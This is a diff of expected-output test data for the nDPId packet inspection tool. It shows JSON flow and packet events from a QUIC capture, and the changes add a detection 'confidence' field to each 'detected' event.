+M24zTzWjn+gbaBdA9Y368TDtVgDjhk+0PWGeyRoCBcFbrGp3fBEtCJrqca3oiS4PMmd2dDVIxkr1nY+QSvCz7lxP9o7YB9OLPDxQmFWKlzHaowYyGDhQ4sUFdFiViXFRffQBO4GUEIqLifq0nd\/NakpsrzU0RqS5YG6uNuPjih1z5buPD7ehrJADajo5Dk+\/f+3lQNTFDfdZ3dd2xeZDkmq80JGAEpHPxGqurIijXd+lbTozqxxqwjhTNnVo2dxefRWbTd03ai6b\/hGokXWjfwn5SLA1W2FheoTwlBMf8\/nG5VrvvfTQYrAQiW0QQNyW1fjr5XCEJZ80G9Ts2SO"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -383,25 +383,25 @@
 00626{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1621495335381,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495335381,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFetAAH4RYBGokEAFgPgYAemJAbsFTnpTy\/8AAB0IqORxJIJl5AcANwCt8wk1cWTApsLKg0qFIIeFQdL8SjnJ21Nj9C4ozIKEt\/+wUZf6f1dPuOm0h1m6yoEiECIbZZdE\/WQnpsKHgdsGaR5qXSnOzRKlmZEms2BJMUJ1gJU+1vqiiTqSMdYTSeQg70VBUuM+3x9Wsw2E03o+Z1GMG+25\/n6NwMjxWm+gXFY1NRlTMkV3W5wOYWyWtaUEJ1GuxnVEaMGpdzPW1AV77AHNHDn1TnbAucEKPzy2Z7cXCuzDt\/9H7U8VZWCbuaotZkdM07nzYkghQ2qDyvNpXGhSNUL7bHDAX3gyAQajMLIOzoUKNAKYaqvN115jAWJ17Leuno6gulXzhvDTc6h49GuoiUQ8KI+Xu59zdoInlbDcFVAjf1jbarKGcwBIepEYbQYRji12orl2Cd2J\/1+Bw0w1aY5+A4\/nXR8NpyrOqilQzMZ\/djaKFpDp2wQtkiivyepGkDCNsqJWpv3Mpp16MQWh3knQKrxErpfqX6AvVazEihxnMQ4\/lZQJF85G6i5\/hhqxRgpLlfxqf8yDAXnP41Vs+9APNn2BuhKubR4aoRulNYKJMq1HmrxFJkWYPmROIqVMuTJ5gGI14OGVc0hdb1JAS5T9H6PUnfDQ4xy0WRLpNbJg4pHooWK\/poGpYPpx9oWdXpFju2U2aLPXQHaalwlFujvwO+z5Kp3CS87EGXs0ZDZDKSALKh0LVBiIak00fb11rcVbdm+DMJDj4QQFBjyVXvYpD\/s3UWsVChEZkFE3nedCDj7vh+5c4gCp05wL1CyNlvX0yC9nZNrd9PEWwozxtSS7auEid+pYxl09QHK5t1svYOMpxEDTebjdq4hAcn\/6xmLg313Z5mnqQGjc1IbzLZAaSMXJYCkfIC83JKqjSEnj4IL1MdqJxOx6HDNp9YD7d6\/\/f8\/wL9ELZHhINgHddlPCKvb86VVYNVvmKys1qBiqdarfutbDcX5q7MbS59s0zBaWxPuzIpu\/\/y4WbjIRgu2TWCnWJSdPC7Qjc2fNbgvcjVvEkTgtAb+pWGsml8538kvECQrljr246X7pAeQ6Rl328xa0txA2awkdTR2Wk\/07SZvUhvNVrpZHNN\/uBdVi\/gqFbPaQtmNYr7ccvsLKKUtd3trzmLlGJjqZrAGduvrEEW9NJT5bIWNvWFv4br5yveMnNX4bpaDG1haMmzx7U6OlmM3KOomrvbRevEeZKz4OYXdrS0x7AiJn3cxU8ZV6t2UtyD2rRiXkxP0GH0SMLlUVrIeDAeXS61FKsQViw4KbhZuYC7JG35I7aDnBvJpT2cojLKnh8D22UVQUC7YIz+L+JkQfLKHmScUY4befIcVYhsE4zFKdj4FbcDDZssysQxUIzWPXjqO85RbZkVhwJZ6QcDMA\/InscSDocIji+mME\/SdF8AIFHFhYqcxF3XJEkr1XiAnrNSjsZrdhd8QomNgx9\/Jva6PaDsTSQtI7y2LQGeZPv7cqaxwKiK0J7JoDrx9arAHuWtQe5bt86Bh81MG6c3EsNnsRmoWdIC6JrwhXNPDY0QTlJMC8ody4xB5guQa259jQwXtYVl6cLF2RxeWEY2NqprP1yX7UldI23tFbTyJMb\/AcwD1vmzT28UF\/oSbC\/3S38SJgbg9+aEbmVFuD944Pv50FJTPzleYonVC5A2YOH0x1NO5XI3iKQM6C\/1v4Lh1wCMNgPJK1VF9Fhh0Ta+l9iAqD9rEm\/DoiFxRwcYyligkxTdm1h3T4\/oYT\/Z8Mgvo1yu23DDNKFJAsZXZlSE0AuNsh5V+\/sk2BjDwu"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335381,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1621495335383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495335383,"pkt":"AAAAAAAAAAEAU0VlCABFAAViNPhAAH4RJE2okEAFmWIcTue\/AbsFTvGexv8AAB0IOo3jhsRNjQEANwBHxNQXfZgQnNGpal0okl9ccuiV6Xx1VVVSOoSDjFN\/WqaQd3bf4jLTMfe18yDQYl1ksGsIMjJE\/X+k1eq0cqPlOyX+nVZA3CKUBe+I06Q01b7sXmYYhr0WJT3kaR9mro469WK6gpT7T4TFYwMpIrtaDA6muvL250OHHrKx2t\/b3j+rVBhRdyz83flQDLS5iJyeiPX3ozrRQ8ufwzIu7VjaOgPDLFPf9CLW6Ex0JWr6LOuOaf71I4Deuwp47CbRSo1v1DJgKlHv23GjLnkhuFaey4\/n8OHVzpyX5hGwEHk01EXAy2I\/0t6k5RU07Rm\/9iC1+Anc0an6X\/5En\/QcUFXIDKQQ0Thy7dKi6TNSrUp6a1tBrt6NwQ27tW\/1KPud11aAq4HGehTpL4HrcEZJ6WRfhBzyOJR5FMA0B\/aet9V93fh5IdqLX+OC3ZB1nATGbkICNniKaUV89lf8n83peKZ0ObXe1ZxWdkVdcZU3LEFcVpo1RTuE1L7x8jQcdWDYcvdEn1Te8UHdP7yraROFUsioeAfpcF778rK+5okAR+2XHHnSdnOHlohFWI1nH1SREZrVHh7JRhDyl8Ucr\/BgNlTDtZwOhLvHQrKAKbHZNh+Yop6avCoxdZcyMauux9VIsx1V6ZcFLgXOdrsIQBCslYzV1nQT77qZUFP5pFFJi6yKZK6JqNzTNo4XAtE\/EmrXjIctL0spz7CUAko8ZCx\/QlZojgyY6l8\/mF\/t0GdVlTfXrBS8k9H2GgvfGIItBGDd7oEIXE8\/x7XEay01BVjgSd+i\/fFLDpHQ80ZkWzpHV3HT72SAoHktM64YPvjZEUI1hUeWmJuYJPomtO+bUx7kO\/d90sGY0xqsv2HBsIxKXVokT0NpQb4HQ\/\/6\/ISGzQgrUOpdVkOQ4Ov2jxibQpg6Vu4ywzr3gBFjvKwX+cgOdNrtcrtCO\/z+jSIIOWVj3BibuGPE9poYNEM8A3bcrqLJXyc3G89K4CYVPfqcyne8lrvC0IGJ1zrYdFUx3gECn4opv\/gdQJXtuOTrUVmH71S5XqG9H0DBG\/sLfb5rsQm+LQOFMiN+jrhKPRrA402Fu4L9OwLTll3iaAH2TP4qDHpL4lAHSm08OEvyaElT80VWlv2GLl35bqH2Y39bpMCq7CkCZv3UgOh3l\/9+mPbAjeGFb00aqhN2vkH0TkgWXcwcZksbOsM+yV8OhtptiXBR4EU\/g0BqPYUf\/i17kayR5JWkci2qp+nf5YWFnxyDprRblGELorjZFQUlksU2RdG4SN1MF4A1eeKjPZlM0HL1zDrMIwtALb02IzmQZ\/Bm\/WUiUYaKyLJwcs2ZwEM2kLSrZp8uJyNf5M3uLoVEDHlKNLba7DN1ef+MMOa7CGGrjpqpw0sZPT5ONzbaAHLUCfOebBzKE9NIEP7C8UHDBrcv6G5CW3oNLes3+0POLAa4kPIRIBua7JjztiSUYQh2RHd4OJOvzA71BVztSPvZl673nw7XzMsbdr5yRgpPAO5OfmfVTBLj873AmjrBo38xLoYPXshplGzi0ikFEynS07HFKA5UOZGq85zAFFcWI5HWixUpkCsAvcwId0fp1BUC9FDRIAhfc\/\/KaShDxhdYfYHSMEK9PXtdq234Pe7ioWnm11vuwdmo3GVpj2tG8uaQQ7pQ4Hvyo2VkgXgRXCH7WUw5XTIbb2ts1zddx2Lh9L2HgixwQtoUEyPMYDhKUevyM22X+x0NPUTz8twzls5Hg0qwDa4hANEFshc4a+3VtH8uy6bSdnlQBUo4quCx"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335383,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1621495335836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495335836,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+mNAAH4RpI6okEAFJ+NIIPm1AbsFTnliw\/8AAB0I4pZJfic2KdUAAEU0G2\/JHhTaDCySWTsRyHcMkznWFPDz+s6YIbogX+v8zxx769L1qgtkV6CvE8r8hbHRMlJ4aqDQ8cnTd+qnT2W9TfmVMr\/V0QP+6QvVQ48j6rtyLfieLy9\/2EkamXQtFIYCWvvW56wuHj2xCT+50ITw+NRr+y9x0NbAGQWozGRk2nR4BKbEsfWPX5\/wqL6hTsunv94vRDKt7EutCZye28TD9oEZAHOg1MaC1b7h0oQC5kjkApzmv08jnPKI9H9f4j\/JQA77vXtBo3U2wrGwehzISa+gzg27eFe0Lz6CL6yGLEsunuBNCJshBMKrp+ijV2rgvg5UQp7dgHCW\/1wu0moHCOx1d9YiEenWAscqFZzCaENXUAI0EuPYxVrNWL604hKBfbSm6P27VV+gA1ELL9R5AQqvLOn6Gmh7AwXHx1PjRRS9ZZeTZzDOrOpcAi0CggBnKIRIsKE94hUybka\/wHV\/UX8z+55FNlySolQCpZKIkqpC+g\/oYQng3hV51VM7kvO5KqfG5HLUVXPscZuabo1fXFu0wfR+YOWFQmXwAeKLw4wbgsr8gSevv1IhYdTeWBQ3qCSH2Tppj2OqfrOoirytq5pj3XRErAqPiCY9F2o1yNDW1fTSxLigm4qy3VUHhT8BbSneM9jhuRSjXUwtUVQiTkh9fIe5kcjtRbujl3+qnTQpnqGD\/TlHOvndYb4rgexjVKSDC4knc0rUty5gi9WhVovaDbmyNsugebY2WME6BJA8Lu8NcnSunCdew311rjHn1f8ncvLm+i\/OY1PB6SImyOzhch6rbP\/IjlcVBQcR+URjxzQhNnom+dzvRHE5cIEiL+1dwZRuOOr7bNmFIX1287mpzg7yqBscxlRDWH0ocb2H4WsfiWBFpKFARkSseaSsa2eVQAIL2m1eD6Q5t6gvJ\/yS9s8El8JwzhGisbnzry5Xy1K6Eg04XDT1lI9sdOVzonqquNY+LbcWO481trrWSpCApp5pm2FmvuVNAEDcE\/leVs7Upo9W3dNaKtj2RQTYCO\/pqhTPVqYf0nCLrPcAqiD+9T41XijcawBR\/vbqo1tZ4KEM0cmR5k1AUaoIZ3+Bzv6PH6Hce0+kR7CW4Ep2f9lzdo1J22p1axhl4ULPWrGGIQfQXq+n5fOWuwREvJQKtwN0C6+WJUfpd91g1CybKUv8MFVhdUf8Z9tfVjfisE3C9rOjB0k0MjLYkNVv+k18kjbqvZJa1J5DuEtyRwEzwZz267jAgfJf\/XgiOr9BkO\/0aR6plCQdvxTD0K6L19vGxNUgCvzjD4L4h8+noYGT953s8stid+4KJgAdsiOqOYzNzPEmgyvvlweAy2zeSHFiyyWUyyy76HG\/MQrVwaXXVfHNGbKhxR9W0ukaLCsoX3onBUGpohxenfTJlZzKL8f6xYrqmYbQV\/2yxhBOtahomZm56JtJZH9kbZ6pFHt4JM3e21Q9rm\/tDp6i9hxJHFb0VyAuvq537RsbPY1kLQWWEsQCs2Tt3Wk40kzGVdrjq3\/r0EUSSt9U+OnMb23TZeuTw1MquX\/yStzFhFP9JcbwXaoADfNoJC+bQLJ8c6WKIjeXyYcAg7kfdAZVh\/F91xeHHcxgWSpMK9hXHHSBSPCeVl1GoIV7g3PihVhaG2LZCuQE7\/iMdk6e2iUIg8fQ54B2ysh5qBAxEKabZxJZaJfM0WbgXRn3GIisLwUCj8Xw6xgKVQ2XrDNV1619IuEcLLz0LdB+5Ys9lRCOKjjsDK7YhqYsH3VOXEGIEM1hAddYg5zeKKiO"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495335836,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00630{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1621495372662,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495372662,"pkt":"AAAAAAAAAAEASYHhCABFAAViK7hAAH4RUtKokEAFZ7MouMMGAbsFTkcuwP8AAB0IxZqmm6+AGC8AAEU0bV1phXsNBAyduWQMMwC6OLQYyTAN1FxuQVMaii5rW8BXPGS0FRwk8HrnF9xMFnBPXfvvEo3QBMM3FudHvdk8cEb+Bo8BomOBxFWNxcTXQHnGOYwDJRX3D+VGcXzFwUoYmTqIRQkkUg\/RXDgv4zX29xNTFSJZ2g4nrk8eulw5HhkFc7yauYf\/ApGm95lgsQ1j+7m8PBWklTsQX6hwGdXDIAv02+sMBfhTQchd1a3DETCVvIEvB3zgW19rHL3EGi1JVlsZU4n\/sCu9BlSoqz1gNiX5dZptoecFN1AbSN0j+aDykV86bt8EAW+l7neIOdiEUtSDvZYs0HOSy8d81eka84F4E25AyCh5Jh4qKAUrTwyky1QcKLkyUsb52v0nNZPnkgfOerwlcB6TuTptQskR2whmUpX7JY7NpYzoP+bSiNZixNyHKsy66zeLu36e+mO9OULTXh1nTVJ5nWB3uSmA7NhWQQFE4WUtBQikelX5MZz8WH2ysNSrIGAoo\/2bMBVU0RtpogNGg7hQ5yCYCS9ewZ13uOeB7XptgaMPF1gNLsQtCfhFk6ef\/IGD3LoSbvbOc0HYo+mifMuhyLvoKbzbavtQTxjr\/BN8j3ypDUZBjhEh438y6mmn1f7adohk5c+uxUd8mwi+IBpv8HBmXQY5puUsZypJHNztPV6aJIh6Up0rlLSwWVKrIC8xNAsiNPMAwoGGx\/XVMBulOOZ6hs\/RBHhwegaA+qv64ubbFEADxru3Zq7D\/YYhDD4KHX9f7DbtYtgURUiA6xsJhOOXb3ciQi\/vZzxt6Mh24fTbT1zp6Pmg1q7vP4jIWXIVFXNJCE7CuU9s2seo56SppSuh\/r28+L9mCauWVe2519clc0WesPZGyQOFWVJGUBtGpU8MBYk2YAmeOz2CyqlNn3SdiKTur+zOdGO8ie8klvK7F8QEXDrzQjkWCs8ClQh4UCknNZJa8gpVH4lz8rVeTWyHJza3U1f938XY4whWDpXVkRb2tmvmX1IQF+lQXiMyPE4Unt5vxehyMhS6SLraGYucF6p4h8DCTwkmMnGAS9zwcIT6fW4iTimSLnell1BouaNm3iu0jMNHt2e7LduTiCHwMdWuN6hrjN3aybR6Fj8+ydHkiW93NhFq4rHV3Lc1p0x3e5C1G7Q1KN7isNa\/PRXQczMknABRwlF6fpe6AEEGLlIHjMRGWiSRuK055l\/W1Z5Stz3MgFh+r2imHY4KtoaqO3nmH\/uARGwbFDlT2KtdiBjpaphwsWP6UUNd7tej\/yMGpMNK9JtLMNN7QuwlAvbHLOiDSWu26o0hPm2y6s1kOsNgLW+xn4Vjz7Mz9pfDGHMKpfWIdOZkZ+CUIuGSOeGdxsohrmhXBJ3bEy8ojcL77VhzUqJFSXK3Sf3c1W\/sHBP6HAEV0vYyCWRBfB7RxHZMrq\/EctwoWwOWHOSW+AMSYdLUpbxBV6SLqMAz1UrzSOJ6gRrQidZGXlFTz1kRh+RMKPYHu3oX663ubZ0C3ijx6BnA7L4hpNSWGrcxv53ZUCUkQA7FCWH\/TtcdnTCACzr0u9NEpwAgUC2LlBqHsWix60mIR+jumXfV+1Q+xHwPIy7vySfL2wpvF5qrjTomfEAnUqayNm+QdT1vJhoJyiVlkGVLNP1q5tkX2MdpGs8WF5iStIN2keOB+bcodYn5zmDhSw278mjC+eLZaIRMC0i0\/X+TsinvcSe7w39bNxE5H8w556PjcUlXwNHYH8Zthv+GodkuVXIFYZUQVL\/D1GXp+I7OLMvHEr6e"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
